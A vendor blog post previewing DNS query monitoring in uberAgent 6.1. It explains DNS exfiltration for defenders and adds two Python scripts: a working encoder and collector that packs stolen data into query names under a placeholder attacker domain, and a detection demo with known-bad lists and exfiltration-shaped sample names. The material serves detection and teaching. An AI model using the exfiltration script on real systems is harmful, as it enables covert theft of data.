
uberAgent 6.1 Preview: DNS Query Monitoring

  • by Helge Klein
  • April 15, 2021

While we’re finalizing version 6.1 of our user experience monitoring & endpoint security analytics products uberAgent UXM and uberAgent ESA, let’s take a look at yet another cool new feature: DNS query monitoring.

What Is DNS Query Monitoring?

DNS query monitoring tracks all outgoing DNS requests on the endpoints where uberAgent is installed.

Which Data Is Collected by DNS Query Monitoring?

uberAgent DNS query monitoring collects the following information about every DNS query:

  • DNS name requested (e.g., www.example.com)
  • DNS response(s) (e.g., 10.2.3.4)
  • DNS response record type (e.g., A, AAAA, CNAME)
  • Name of the process making the query (e.g., chrome.exe)
  • GUID of the process making the query

DNS Query Monitoring Metadata

The process GUID uniquely identifies the process instance making the DNS query. By looking the GUID up in the other sourcetypes collected by uberAgent, a lot of metadata about that process is readily available, including, but not limited to:

  • Command line
  • User account
  • Application the process is a part of
  • Elevation status
  • Parent process
  • Authenticode signature status (see announcement blog post)
  • Hash of the process image
  • Network communications (e.g., target hosts, ports, IPs, amount of data transferred)

Why Monitor DNS Queries?

DNS query monitoring is a useful technique in any IT security professional’s arsenal, because DNS is a base technology that nearly all network communications rely on: before a process can talk to a host by name, it has to resolve that name. Factoring in that DNS was designed when the internet was still deemed a safe and trustworthy place, there are multiple aspects of DNS that warrant close inspection.

Detecting Unusual or Malicious Domains

Any kind of advanced DNS analytics requires reliable information about which process on which endpoint tries to talk to which internet hosts. Some organizations want to be able to identify domains that have never been seen in their environment before, others want to be able to match DNS queries against lists of known-bad domains.

Detecting DNS Data Exfiltration

Data exfiltration via DNS queries has become quite common. It is a powerful technique for attackers because it does not require a direct network connection between the source and target hosts. Instead, it only requires a working DNS infrastructure: as long as the victim can resolve names through the local resolver, that resolver forwards the queries on the attacker’s behalf.

How Does DNS Data Exfiltration Work?

DNS data exfiltration is a simple technique. It exploits the fact that a query for any name under a domain is ultimately forwarded, through whatever recursive resolvers sit in between, to the name server that is authoritative for that domain. If an attacker controls that name server, embedding the data to be exfiltrated into the DNS name to be resolved delivers the data straight to them.

In a nutshell:

  1. Victim machine: sends a DNS query for YOUR-EXFIL-DATA.domain.com
  2. Name server authoritative for domain.com: a simple script extracts YOUR-EXFIL-DATA from the incoming query names and reassembles the pieces

You can find a detailed description in the blog post DNS exfiltration of data: step-by-step simple guide.
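As an added illustration (not code from this post, from uberAgent, or from the guide linked above), the following Python script walks through both halves of the technique: the victim side, which encodes a payload into query names under the attacker-controlled zone (the placeholder domain.com from the list above; the session label, the sequence-number layout and the base32 encoding are assumptions made here), and the server side, the "simple script" that pulls the chunks out of the names it receives and reassembles them. It respects the 63-octet label and 253-octet name limits from RFC 1035, keeps every name unique so caching resolvers forward it instead of answering from cache, and tolerates queries arriving out of order or twice, as resolver retries cause.

```python
import base64
import re
from collections import defaultdict

# Attacker-controlled zone; placeholder taken from the post's example, not a real target.
EXFIL_DOMAIN = "domain.com"
MAX_LABEL = 63            # RFC 1035: a single label is at most 63 octets
LABELS_PER_QUERY = 3      # 3 * 63 payload chars keeps the name well under 253 octets


def encode_for_dns(data: bytes) -> str:
    # base32 uses only letters and digits and survives case folding by resolvers;
    # the '=' padding is stripped because it is not a valid hostname character.
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def decode_from_dns(text: str) -> bytes:
    padded = text.upper() + "=" * (-len(text) % 8)
    return base64.b32decode(padded)


def build_queries(data: bytes, session: str, domain: str = EXFIL_DOMAIN) -> list[str]:
    """Victim side: turn a payload into names of the form
    <seq>.<chunk labels>.<session>.<domain>. The sequence number makes every
    name unique, so caching resolvers forward each query to the authoritative
    server rather than answering it locally."""
    encoded = encode_for_dns(data)
    chunk_size = MAX_LABEL * LABELS_PER_QUERY
    names = []
    for seq, start in enumerate(range(0, len(encoded), chunk_size)):
        chunk = encoded[start:start + chunk_size]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        names.append(f"{seq}.{'.'.join(labels)}.{session}.{domain}")
    return names


class ExfilCollector:
    """Attacker side: what the script on the authoritative name server does
    with the query names it receives."""

    def __init__(self, domain: str = EXFIL_DOMAIN):
        self.pattern = re.compile(
            r"^(?P<seq>\d+)\.(?P<chunk>[a-z0-9.]+?)\.(?P<session>[a-z0-9]+)\."
            + re.escape(domain) + r"\.?$", re.IGNORECASE)
        self.sessions: dict[str, dict[int, str]] = defaultdict(dict)

    def observe(self, qname: str) -> bool:
        m = self.pattern.match(qname)
        if not m:
            return False          # ordinary query for the zone, nothing to extract
        # Retried (duplicate) queries overwrite the same slot, so they are harmless.
        self.sessions[m["session"].lower()][int(m["seq"])] = m["chunk"].replace(".", "").lower()
        return True

    def reassemble(self, session: str) -> bytes:
        chunks = self.sessions[session]
        if set(chunks) != set(range(len(chunks))):
            raise ValueError("missing chunks for session " + session)
        return decode_from_dns("".join(chunks[i] for i in range(len(chunks))))


def demo() -> bytes:
    # Constructed payload; the session label is an arbitrary per-run identifier.
    secret = b"user=alice;password=hunter2;card=4111111111111111\n" * 5
    queries = build_queries(secret, session="s1a2b3")
    collector = ExfilCollector()
    # Deliver out of order and with one duplicate, as real resolvers might.
    for q in reversed(queries + queries[:1]):
        collector.observe(q)
    return collector.reassemble("s1a2b3")


if __name__ == "__main__":
    for q in build_queries(b"hello", "s1a2b3"):
        print(q)
    print(demo() == b"user=alice;password=hunter2;card=4111111111111111\n" * 5)
```

From the defender's side the script also shows why per-process DNS visibility matters: each exfiltrated payload becomes a burst of unique, long, label-dense names under one zone, attributable to one process instance, which is exactly the data the fields listed earlier make available.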

Data Volume Reduction and DNS Query Filtering

On a large number of endpoints, the total count of DNS queries can be staggeringly high. We have taken measures and provide options to keep the data volume in check.

Folding Identical Queries Into a Single Event

Often, applications query DNS for the same name over and over again. uberAgent detects that repetition and folds identical queries into a single Splunk event. The query count is embedded in the event, too, of course, so that you don’t lose the query’s frequency.

Filtering Known-Good DNS Queries

In many cases, it’s OK to exclude high-volume, low-risk queries. By doing that you lose a degree of visibility, potentially missing command and control (C2) traffic that hides behind an excluded domain, but you also significantly reduce the number of events generated by DNS query monitoring. The narrower an exclusion is (a known domain, but only when queried by the process expected to query it), the less you give up.

uberAgent offers a sophisticated tool to fine-tune which DNS queries to exclude: event data filtering (EDF) on the endpoint. With EDF, the decision whether to exclude an event can be based on any combination of the event’s fields’ content. It allows you to filter events depending on the originating process, on the user account, or regex-match the DNS name queried. More information is available in the blog post announcing event data filtering.

uberAgent ESA Ships With Comprehensive Filtering Rules

Powerful filtering capabilities are great to have, but creating a production-grade set of filtering rules can be a lot of work. That’s why we did it for you! uberAgent ESA ships with one of the best DNS query filtering rulesets, the list compiled by SwiftOnSecurity as part of their Sysmon configuration.
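To make folding, field-based exclusion and the downstream analytics concrete, here is an added Python example. It is not part of the post or of uberAgent, does not use uberAgent’s or SwiftOnSecurity’s rule syntax, and is not the shipped ruleset. It runs a constructed set of DNS events (made-up process names, GUIDs, users, names and responses) through three stages: folding identical queries into one event with a count; dropping events that match exclusion rules that combine process, user and a regex on the name, in the spirit of EDF; and checking what survives against a known-bad list, a baseline of registered domains seen before, and a per-process count of unique names under one domain, the cardinality pattern DNS exfiltration produces. The lists, the threshold of 20 and the naive registered-domain extraction are assumptions.

```python
import re
from collections import OrderedDict, defaultdict


def make_sample_events():
    """Constructed events carrying the per-query fields the post lists (name,
    response, record type, process name, process GUID) plus the user account
    that would be joined in via the GUID. Every value here is made up."""
    events = [
        {"guid": "g1", "proc": "chrome.exe",  "user": "alice",  "name": "www.example.com",         "type": "A",    "resp": "10.2.3.4"},
        {"guid": "g1", "proc": "chrome.exe",  "user": "alice",  "name": "www.example.com",         "type": "A",    "resp": "10.2.3.4"},
        {"guid": "g1", "proc": "chrome.exe",  "user": "alice",  "name": "www.example.com",         "type": "AAAA", "resp": "2001:db8::4"},
        {"guid": "g2", "proc": "svchost.exe", "user": "SYSTEM", "name": "ctldl.windowsupdate.com", "type": "A",    "resp": "10.9.9.9"},
        {"guid": "g2", "proc": "svchost.exe", "user": "SYSTEM", "name": "ctldl.windowsupdate.com", "type": "A",    "resp": "10.9.9.9"},
        {"guid": "g3", "proc": "chrome.exe",  "user": "alice",  "name": "ctldl.windowsupdate.com", "type": "A",    "resp": "10.9.9.9"},
        {"guid": "g5", "proc": "update.exe",  "user": "bob",    "name": "cdn.known-bad.test",      "type": "A",    "resp": "10.66.66.66"},
    ]
    # A burst of unique, chunk-carrying names under one zone: the shape DNS
    # exfiltration produces, since every query must be unique to bypass caches.
    for seq in range(25):
        events.append({"guid": "g4", "proc": "powershell.exe", "user": "alice",
                       "name": f"{seq}.nbswy3dpeb3w64tmmq.s1a2b3.evil-zone.test",
                       "type": "A", "resp": "NXDOMAIN"})
    return events


# Exclusion rules in the spirit of EDF (hypothetical shape, not uberAgent
# syntax): every condition in a rule must hold for the event to be dropped.
# Exact, case-insensitive match on process and user; regex on the name.
EXCLUDE_RULES = [
    {"proc": "svchost.exe", "user": "SYSTEM", "name_regex": r"\.windowsupdate\.com$"},
    {"name_regex": r"(^|\.)example\.com$"},
]


def fold(events):
    """Fold identical queries (same process instance, name, record type and
    response) into a single event that carries the query count."""
    folded = OrderedDict()
    for e in events:
        key = (e["guid"], e["name"].lower(), e["type"], e["resp"])
        if key in folded:
            folded[key]["count"] += 1
        else:
            folded[key] = dict(e, count=1)
    return list(folded.values())


def excluded(event, rules=EXCLUDE_RULES):
    for rule in rules:
        for field, expected in rule.items():
            if field == "name_regex":
                hit = re.search(expected, event["name"], re.IGNORECASE) is not None
            else:
                hit = event.get(field, "").lower() == expected.lower()
            if not hit:
                break
        else:
            return True   # every condition of this rule matched
    return False


def registered_domain(name):
    # Naive: the last two labels. Production code should consult the Public
    # Suffix List, otherwise "example.co.uk" collapses to "co.uk".
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def analyze(events, known_bad, baseline, rules=EXCLUDE_RULES, cardinality=20):
    """Fold, filter, then flag: known-bad domains, registered domains never
    seen before, and (process, domain) pairs with many unique names."""
    kept = [e for e in fold(events) if not excluded(e, rules)]
    alerts = {"known-bad": set(), "first-seen": set(), "high-cardinality": set()}
    unique_names = defaultdict(set)
    for e in kept:
        dom = registered_domain(e["name"])
        if dom in known_bad:
            alerts["known-bad"].add(dom)
        elif dom not in baseline:
            alerts["first-seen"].add(dom)
        unique_names[(e["proc"], dom)].add(e["name"].lower())
    for key, names in unique_names.items():
        if len(names) >= cardinality:
            alerts["high-cardinality"].add(key)
    return kept, alerts


def run_demo():
    known_bad = {"known-bad.test"}                    # constructed blocklist
    baseline = {"example.com", "windowsupdate.com"}   # registered domains seen before
    return analyze(make_sample_events(), known_bad, baseline)


if __name__ == "__main__":
    kept, alerts = run_demo()
    print(f"{len(kept)} events kept after folding and filtering")
    for kind, items in alerts.items():
        print(kind, sorted(items))
```

Note what the first rule does and does not drop: svchost.exe querying windowsupdate.com as SYSTEM is excluded, but the same name queried by chrome.exe survives, because the rule ties the domain to the process expected to query it. That is the kind of combination the post describes, and it is why the exfiltration burst from powershell.exe is still there to be flagged after the high-volume noise is gone.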

About uberAgent

The uberAgent product family offers innovative digital employee experience monitoring and endpoint security analytics for Windows and macOS.

uberAgent UXM highlights include detailed information about boot and logon duration, application unresponsiveness detection, network reliability drill-downs, process startup duration, application usage metering, browser performance, web app metrics, and Citrix insights. All these varied aspects of system performance and reliability are smartly brought together in the Experience Score dashboard.

uberAgent ESA excels with a sophisticated Threat Detection Engine, endpoint security & compliance rating, the uAQL query language, detection of risky activity, DNS query monitoring, hash calculation, registry monitoring, and Authenticode signature verification. uberAgent ESA comes with Sysmon and Sigma rule converters, a graphical rule editor, and uses a simple yet powerful query language instead of XML.

About vast limits

vast limits GmbH is the company behind uberAgent, the innovative digital employee experience monitoring and endpoint security analytics product. vast limits’ customer list includes organizations from industries like finance, healthcare, professional services, and education, ranging from medium-sized businesses to global enterprises. vast limits’ network of qualified solution partners ensures best-in-class service and support anywhere in the world.
